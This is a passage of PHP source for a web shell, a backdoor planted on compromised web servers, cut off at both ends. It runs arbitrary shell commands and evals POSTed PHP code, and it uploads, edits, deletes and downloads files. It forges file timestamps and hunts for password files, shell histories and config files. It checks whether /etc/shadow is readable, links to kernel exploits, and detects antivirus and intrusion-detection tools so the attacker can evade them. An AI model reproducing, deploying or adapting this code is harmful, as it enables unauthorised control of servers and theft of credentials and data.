"locate admin.php files" =>"locate admin.php",
"locate cfg.php files"=>"locate cfg.php",
"locate conf.php files"=>"locate conf.php",
"locate config.dat files"=>"locate config.dat",
"locate config.php files"=>"locate config.php",
"locate config.inc files"=>"locate config.inc",
"locate config.inc.php"=>"locate config.inc.php",
"locate config.default.php files"=>"locate config.default.php",
"locate config* files "=>"locate config",
"locate .conf files"=>"locate '.conf'",
"locate .pwd files"=>"locate '.pwd'",
"locate .sql files"=>"locate '.sql'",
"locate .htpasswd files"=>"locate '.htpasswd'",
"locate .bash_history files"=>"locate '.bash_history'",
"locate .mysql_history files"=>"locate '.mysql_history'",
"locate .fetchmailrc files"=>"locate '.fetchmailrc'",
"locate backup files"=>"locate backup",
"locate dump files"=>"locate dump",
"locate priv files"=>"locate priv"
);

function XHeader(){
if(empty($_POST['charset']))
$_POST['charset']=$GLOBALS['default_charset'];
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=$_POST[charset]'>
<title>$_SERVER[HTTP_HOST] - B0FF codesupp edit</title>
<style>body{background-color:#000028;color:#e1e1e1}
body,td,th{border:1px outset black;font:9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1}
table.info{border-left:5px solid #df5;color:#fff;background-color:#000028}
span,h1,a{color:#df5 !important}
span{font-weight:bolder}
h1{border-left:7px solid #df5;padding:2px 5px;font:14pt Verdana;background-color:#000028;margin:0px}
div.content{padding:7px;margin-left:7px;background-color:#333}
a{text-decoration:none}
a:hover{text-decoration:underline}
.ml1{border:1px solid #444;padding:5px;margin:0;overflow:auto}
.bigarea{width:100%;height:250px}
input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5; font:9pt Monospace,'Courier New'}
form{margin:0px}
#toolsTbl{text-align:center}
.toolsInp{width:300px}
.main th{text-align:left;background-color:#003300}
.main tr:hover{border:2px outset gray;;background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace}
</style>
<script>
var c_='".htmlspecialchars($GLOBALS['cwd'])."';
var a_='".htmlspecialchars(@$_POST['a']) ."'
var charset_='".htmlspecialchars(@$_POST['charset']) ."';
var p1_='".((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p2_='".((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_='".((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
var d=document;
function set(a,c,p1,p2,p3,charset){
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset){
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset){
set(a,c,p1,p2,p3,charset);
var params='ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('".addslashes($_SERVER['REQUEST_URI']) ."',params);
}
function sr(url,params){
if(window.XMLHttpRequest)
req=new XMLHttpRequest();
else if(window.ActiveXObject)
req=new ActiveXObject('Microsoft.XMLHTTP');
if(req){
req.onreadystatechange=processReqChange;
req.open('POST',url,true);
req.setRequestHeader ('Content-Type','application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange(){
if((req.readyState==4))
if(req.status==200){
var reg=new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\",'m');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0,arr[1]));
}else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace=@diskfreespace($GLOBALS['cwd']);
$totalSpace=@disk_total_space($GLOBALS['cwd']);
$totalSpace=$totalSpace?$totalSpace:1;
$release=@php_uname('r');
$kernel=@php_uname('s');
$explink='http://exploit-db.com/list.php?description=';
if(strpos('Linux',$kernel)!==false)
$explink .= urlencode('Linux Kernel '.substr($release,0,6));
else
$explink .= urlencode($kernel.' '.substr($release,0,3));
if(!function_exists('posix_getegid')){
$user=@get_current_user();
$uid=@getmyuid();
$gid=@getmygid();
$group="?";
}else {
$uid=@posix_getpwuid(posix_geteuid());
$gid=@posix_getgrgid(posix_getegid());
$user=$uid['name'];
$uid=$uid['uid'];
$group=$gid['name'];
$gid=$gid['gid'];
}

$cwd_links='';
$path=explode("/",$GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++){
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}

$charsets=array('UTF-8','Windows-1251','KOI8-R','KOI8-U','cp866');
$opt_charsets='';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

$m=array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode');
if(!empty($GLOBALS['auth_pass']))
$m['Logout']='Logout';
$m['Self remove']='SelfRemove';
$menu='';
foreach($m as $k=>$v)
$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

$drives="";
if($GLOBALS['os']=='win'){
foreach(range('c','z') as $drive)
if(is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os']=='win'?'<br>Drives:':'').'</span></td>'
.'<td><nobr>'.substr(@php_uname(),0,120).' <a href="'.$explink.'"
target=_blank>[exploit-db.com]</a></nobr><br>'.$uid.' ('.$user.') <span>
Group:</span> '.$gid.' ('.$group.')<br>'.@phpversion().'
<span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
.' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.XViewSize($totalSpace).' <span>Free:</span> '.XViewSize($freeSpace).' ('. (int)
($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '. XPermsColor($GLOBALS['cwd']).' <a href=#
onclick="g(\'FilesMan\',\''.$GLOBALS
['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'
.'<td width=1 align=right><nobr>
<select onchange="g(null,null,null,null,null,this.value)">
<optgroup label="Page charset">'.$opt_charsets.'</optgroup>
</select><br><span>Server IP:</span><br>'.@$_SERVER["SERVER_ADDR"].'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'
.'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr>
</table><div style="margin:5">';
}

function XFooter(){
$is_writable=is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font
color=red>(Not writable)</font>";
echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);
return false;\">
<span>Read file:</span><br>
<input class='toolsInp' type=text name=f>
<input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);
return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');
return false;\"><span>Make file:</span>$is_writable<br>
<input class='toolsInp' type=text name=f>
<input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);
return false;\"><span>Execute:</span>
<br><input
class='toolsInp' type=text name=c value=''>
<input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='".$GLOBALS['cwd'] ."'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp'
type=file name=f>
<input type=submit value='>>'>
</form><br></td>
</tr></table></div></body></html>";
}

if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){
function posix_getpwuid($p){return false;}}
if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){
function posix_getgrgid($p){return false;}}

function XEx($in){
$out='';
if(function_exists('exec')){
@exec($in,$out);
$out=@join("\n",$out);
}elseif(function_exists('passthru')){
ob_start();
@passthru($in);
$out=ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out=ob_get_clean();
}elseif(function_exists('shell_exec')){
$out=shell_exec($in);
}elseif(is_resource($f=@popen($in,"r"))){
$out="";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function XViewSize($s){
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576).' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024).' KB';
else
return $s.' B';
}

function XPerms($p){
if(($p & 0xC000)==0xC000)$i='s';
elseif(($p & 0xA000)==0xA000)$i='l';
elseif(($p & 0x8000)==0x8000)$i='-';
elseif(($p & 0x6000)==0x6000)$i='b';
elseif(($p & 0x4000)==0x4000)$i='d';
elseif(($p & 0x2000)==0x2000)$i='c';
elseif(($p & 0x1000)==0x1000)$i='p';
else $i='u';
$i .= (($p & 0x0100)?'r':'-');
$i .= (($p & 0x0080)?'w':'-');
$i .= (($p & 0x0040)?(($p & 0x0800)?'s':'x'):(($p & 0x0800)?'S':'-'));
$i .= (($p & 0x0020)?'r':'-');
$i .= (($p & 0x0010)?'w':'-');
$i .= (($p & 0x0008)?(($p & 0x0400)?'s':'x'):(($p & 0x0400)?'S':'-'));
$i .= (($p & 0x0004)?'r':'-');
$i .= (($p & 0x0002)?'w':'-');
$i .= (($p & 0x0001)?(($p & 0x0200)?'t':'x'):(($p & 0x0200)?'T':'-'));
return $i;
}

function XPermsColor($f){
if(!@is_readable($f))
return '<font color=#FF0000>'.XPerms(@fileperms($f)).'</font>';
elseif(!@is_writable($f))
return '<font color=white>'.XPerms(@fileperms($f)).'</font>';
else
return '<font color=#25ff00>'.XPerms(@fileperms($f)).'</font>';
}

if(!function_exists("scandir")){
function scandir($dir){
$dh= opendir($dir);
while (false!==($filename=readdir($dh)))
$files[]=$filename;
return $files;
}
}

function XWhich($p){
$path=XEx('which '.$p);
if(!empty($path))
return $path;
return false;
}

function actionSecInfo(){
XHeader();
echo '<h1>Server security information</h1><div class=content>';
function XSecParam($n,$v){
$v=trim($v);
if($v){
echo '<span>'.$n.': </span>';
if(strpos($v,"\n") === false)
echo $v.'<br>';
else
echo '<pre class=ml1>'.$v.'</pre>';
}
}

XSecParam('Server software',@getenv('SERVER_SOFTWARE'));
if(function_exists('apache_get_modules'))
XSecParam('Loaded Apache modules',implode(',',apache_get_modules()));
XSecParam('Disabled PHP Functions',
$GLOBALS['disable_functions']?
$GLOBALS['disable_functions']:'none');
XSecParam('Open base dir',@ini_get('open_basedir'));
XSecParam('Safe mode exec dir',@ini_get('safe_mode_exec_dir'));
XSecParam('Safe mode include dir',@ini_get('safe_mode_include_dir'));
XSecParam('cURL support',function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[]="MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[]="MSSQL";
if(function_exists('pg_connect'))
$temp[]="PostgreSQL";
if(function_exists('oci_connect'))
$temp[]="Oracle";
XSecParam('Supported databases',implode(',',$temp));
echo '<br>';

if($GLOBALS['os']=='nix'){
XSecParam('Readable /etc/passwd',@is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\",\"/etc/\",\"passwd\")'>[view]</a>":'no');
XSecParam('Readable /etc/shadow',@is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\",\"etc\",\"shadow\")'>[view]</a>":'no');
XSecParam('OS version',@file_get_contents('/proc/version'));
XSecParam('Distr name',@file_get_contents('/etc/issue.net'));
if(!$GLOBALS['safe_mode']){
$userful=array('gcc','lcc','cc','ld','make','php','perl',
'python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
$danger=array('kav','nod32','bdcored','uvscan','sav','drwebd',
'clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc',
'portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch',
'sysmask','zmbscap','sawmill','wormscan','ninja');
$downloaders=array('wget','fetch','lynx','links','curl','get','lwp-mirror');
echo '<br>';
$temp=array();
foreach ($userful as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam('Userful',implode(',',$temp));
$temp=array();
foreach ($danger as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam('Danger',implode(',',$temp));
$temp=array();
foreach ($downloaders as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam('Downloaders',implode(',',$temp));
echo '<br/>';
XSecParam('HDD space',XEx('df -h'));
XSecParam('Hosts',@file_get_contents('/etc/hosts'));
}
}else {
XSecParam('OS Version',XEx('ver'));
XSecParam('Account Settings',XEx('net accounts'));
XSecParam('User Accounts',XEx('net user'));
}
echo '</div>';
XFooter();
}

function actionPhp(){
if(isset($_POST['ajax'])){
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;
ob_start();
eval($_POST['p1']);
$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo strlen($temp),"\n",$temp;
exit;
}
XHeader();
if(isset($_POST['p2'])&&($_POST['p2']=='info')){
echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp=ob_get_clean();
$tmp=preg_replace('!(body|a:\w+|body,td,th,h1,h2){.*}!msiU','',$tmp);
$tmp=preg_replace('!td,th {(.*)}!msiU','.e,.v,.h,.h th {$1}',$tmp);
echo str_replace('<h1','<h2',$tmp) .'</div><br>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;
echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
if(!empty($_POST['p1'])){
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '</pre></div>';
XFooter();
}

function actionFilesMan(){
XHeader();
echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
if(!empty($_POST['p1'])){
switch($_POST['p1']){
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']))
echo "Can't upload file!";
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create new dir";
break;
case 'delete':
function deleteDir($path){
$path=(substr($path,-1)=='/')?$path:$path.'/';
$dh= opendir($path);
while (($item=readdir($dh))!==false){
$item=$path.$item;
if((basename($item)=="..")||(basename($item)=="."))
continue;
$type=filetype($item);
if($type=="dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f=='..')
continue;
$f=urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_SESSION['act']=='copy'){
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.'/',$f,$d.$s.'/');
}elseif(is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['c'],$f,$GLOBALS['cwd']);
}elseif($_SESSION['act']=='move'){
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.'/',$f,$d.$s.'/');
}elseif(@is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['c'].$f,$GLOBALS['cwd'].$f);
}elseif($_SESSION['act']=='zip'){
if(class_exists('ZipArchive')){
$zip=new ZipArchive();
if($zip->open($_POST['p2'],1)){
chdir($_SESSION['c']);
foreach($_SESSION['f'] as $f){
if($f=='..')
continue;
if(@is_file($_SESSION['c'].$f))
$zip->addFile($_SESSION['c'].$f,$f);
elseif(@is_dir($_SESSION['c'].$f)){
$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
foreach ($iterator as $key=>$value){
$zip->addFile(realpath($key),$key);
}
}
}
chdir($GLOBALS['cwd']);
$zip->close();
}
}
}elseif($_SESSION['act']=='unzip'){
if(class_exists('ZipArchive')){
$zip=new ZipArchive();
foreach($_SESSION['f'] as $f){
if($zip->open($_SESSION['c'].$f)){
$zip->extractTo($GLOBALS['cwd']);
$zip->close();
}
}
}
}elseif($_SESSION['act']=='tar'){
chdir($_SESSION['c']);
$_SESSION['f']=array_map('escapeshellarg',$_SESSION['f']);
XEx('tar cfzv '.escapeshellarg($_POST['p2']).' '.implode(' ',$_SESSION['f']));
chdir($GLOBALS['cwd']);
}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['p1'])){
$_SESSION['act']=@$_POST['p1'];
$_SESSION['f']=@$_POST['f'];
foreach($_SESSION['f'] as $k=>$f)
$_SESSION['f'][$k]=urldecode($f);
$_SESSION['c']=@$_POST['c'];
}
break;
}
}
$dirContent=@scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false){echo 'Can\'t open this folder!';XFooter(); return; }
global $sort;
$sort=array('name',1);
if(!empty($_POST['p1'])){
if(preg_match('!s_([A-z]+)_(\d{1})!',$_POST['p1'],$match))
$sort=array($match[1],(int)$match[2]);
}
echo "<script>
function sa(){
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type=='checkbox')
d.files.elements[i].checked=d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a
href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#'
onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a
href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a>
</th><th>Actions</th></tr>";
$dirs=$files=array();
$n=count($dirContent);
for($i=0;$i<$n;$i++){
$ow=@posix_getpwuid(@fileowner($dirContent[$i]));
$gr=@posix_getgrgid(@filegroup($dirContent[$i]));
$tmp=array('name'=>$dirContent[$i],
 'path'=>$GLOBALS['cwd'].$dirContent[$i],
 'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
 'perms'=>XPermsColor($GLOBALS['cwd'].$dirContent[$i]),
 'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),
 'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),
 'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[]=array_merge($tmp,array('type'=>'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$dirs[]=array_merge($tmp,array('type'=>'link','link'=>readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i]!="."))
$dirs[]=array_merge($tmp,array('type'=>'dir'));
}
$GLOBALS['sort']=$sort;
function XCmp($a,$b){
if($GLOBALS['sort'][0]!='size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]),strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size'])?-1:1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files,"XCmp");
usort($dirs,"XCmp");
$files=array_merge($dirs,$files);
$l=0;
foreach($files as $f){
echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"
title='.$f['link'].'><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td>
<td>'.(($f['type']=='file')?XViewSize($f['size']):$f['type']).'</td>
<td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td>
<td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode
($f['name']).'\',\'edit\')">E</a>
<a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'download\')">D</a>':'').'</td></tr>';
$l=$l?0:1;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
if(class_exists('ZipArchive'))
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
echo "<option value='tar'>Compress (tar.gz)</option>";
if(!empty($_SESSION['act'])&&@count($_SESSION['f']))
echo "<option value='paste'>Paste / Compress</option>";
echo "</select>&nbsp;";
if(!empty($_SESSION['act'])&&@count($_SESSION['f'])&&(($_SESSION['act']=='zip')||($_SESSION['act']=='tar')))
echo "file name: <input type=text name=p2 value='X_".date("Ymd_His").".".($_SESSION['act']=='zip'?'zip':'tar.gz')."'>&nbsp;";
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
XFooter();
}

function actionFilesTools(){
if(isset($_POST['p1']))
$_POST['p1']=urldecode($_POST['p1']);
if(@$_POST['p2']=='download'){
if(@is_file($_POST['p1'])&&@is_readable($_POST['p1'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
if(function_exists("mime_content_type")){
$type=@mime_content_type($_POST['p1']);
header("Content-Type: ".$type);
}else
header("Content-Type: application/octet-stream");
$fp=@fopen($_POST['p1'],"r");
if($fp){
while(!@feof($fp))
echo @fread($fp,1024);
fclose($fp);
}
}exit;
}
if(@$_POST['p2']=='mkfile'){
if(!file_exists($_POST['p1'])){
$fp=@fopen($_POST['p1'],'w');
if($fp){
$_POST['p2']="edit";
fclose($fp);
}
}
}
XHeader();
echo '<h1>File tools</h1><div class=content>';
if(!file_exists(@$_POST['p1'])){
echo 'File not exists';
XFooter();
return;
}
$uid=@posix_getpwuid(@fileowner($_POST['p1']));
if(!$uid){
$uid['name']=@fileowner($_POST['p1']);
$gid['name']=@filegroup($_POST['p1']);
}else $gid=@posix_getgrgid(@filegroup($_POST['p1']));
echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?XViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.XPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime
($_POST['p1'])).'
<span>Access time:</span>
'.date('Y-m-d H:i:s',fileatime($_POST['p1'])).'
<span>Modify time:</span>
 '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
if(empty($_POST['p2']))
$_POST['p2']='view';
if(is_file($_POST['p1']))
$m=array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch');
else
$m=array('Chmod','Rename','Touch');
foreach($m as $v)
echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]
</b>':$v).'</a> ';
echo '<br><br>';
switch($_POST['p2']){
case 'view':
echo '<pre class=ml1>';
$fp=@fopen($_POST['p1'],'r');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo '</pre>';
break;
case 'highlight':
if(@is_readable($_POST['p1'])){
echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
$code=@highlight_file($_POST['p1'],true);
echo str_replace(array('<span ','</span>'),array('<font ','</font>'),$code).'</div>';
}
break;
case 'chmod':
if(!empty($_POST['p3'])){
$perms=0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8,(strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'],$perms))
echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o',fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
break;
case 'edit':
if(!is_writable($_POST['p1'])){
echo 'File isn\'t writeable';
break;
}
if(!empty($_POST['p3'])){
$time=@filemtime($_POST['p1']);
$_POST['p3']=substr($_POST['p3'],1);
$fp=@fopen($_POST['p1'],"w");
if($fp){
@fwrite($fp,$_POST['p3']);
@fclose($fp);
echo 'Saved!<br><script>p3_="";</script>';
@touch($_POST['p1'],$time,$time);
}
}
echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
$fp=@fopen($_POST['p1'],'r');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo '</textarea><input type=submit value=">>"></form>';
break;
case 'hexdump':
$c=@file_get_contents($_POST['p1']);
$n=0;
$h=array('00000000<br>','','');
$len=strlen($c);
for ($i=0; $i<$len; ++$i){
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch (ord($c[$i])){
case 0:$h[2] .= ' '; break;
case 9:$h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if($n==32){
$n=0;
if($i+1 < $len){$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "\n";
}
 }
echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222>
<tr><td bgcolor=#333333>
<span style="font-weight:
normal;"><pre>'.$h[0].'</pre>
</span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td
bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
break;
case 'rename':
if(!empty($_POST['p3'])){
if(!@rename($_POST['p1'],$_POST['p3']))
echo 'Can\'t rename!<br>';
else
die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
}
echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
break;
case 'touch':
if(!empty($_POST['p3'])){
$time=strtotime($_POST['p3']);
if($time){
if(!touch($_POST['p1'],$time,$time))
echo 'Fail!';
else
echo 'Touched!';
}else echo 'Bad time format!';
}
clearstatcache();
echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date
("Y-m-d H:i:s",@filemtime($_POST['p1'])).'">
